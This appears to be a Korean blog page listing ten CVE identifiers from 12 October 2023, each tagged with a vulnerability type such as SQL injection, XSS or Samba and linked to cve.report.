2023-10-12 09:05:11.559962 (Samba) CVE-2023-3961 https://cve.report/CVE-2023-3961
2023-10-12 16:05:02.524602 (XSS) CVE-2023-32721 https://cve.report/CVE-2023-32721
2023-10-12 16:05:02.541501 (GitHub) CVE-2023-29453 https://cve.report/CVE-2023-29453
2023-10-12 16:05:02.557683 (Remote Attack) CVE-2023-40833 https://cve.report/CVE-2023-40833
2023-10-12 20:05:03.289741 (GitHub, XSS) CVE-2023-5555 https://cve.report/CVE-2023-5555
2023-10-12 21:05:03.173872 (SQL injection) CVE-2023-5045 https://cve.report/CVE-2023-5045
2023-10-12 21:05:03.186512 (GitHub, XSS) CVE-2023-5556 https://cve.report/CVE-2023-5556
2023-10-12 22:05:02.263674 (SQL injection) CVE-2023-23737 https://cve.report/CVE-2023-23737
2023-10-12 22:05:02.325173 (SQL injection) CVE-2023-23651 https://cve.report/CVE-2023-23651
2023-10-12 22:05:02.337695 (SQL injection) CVE-2023-5046 https://cve.report/CVE-2023-5046
반응형

+ Recent posts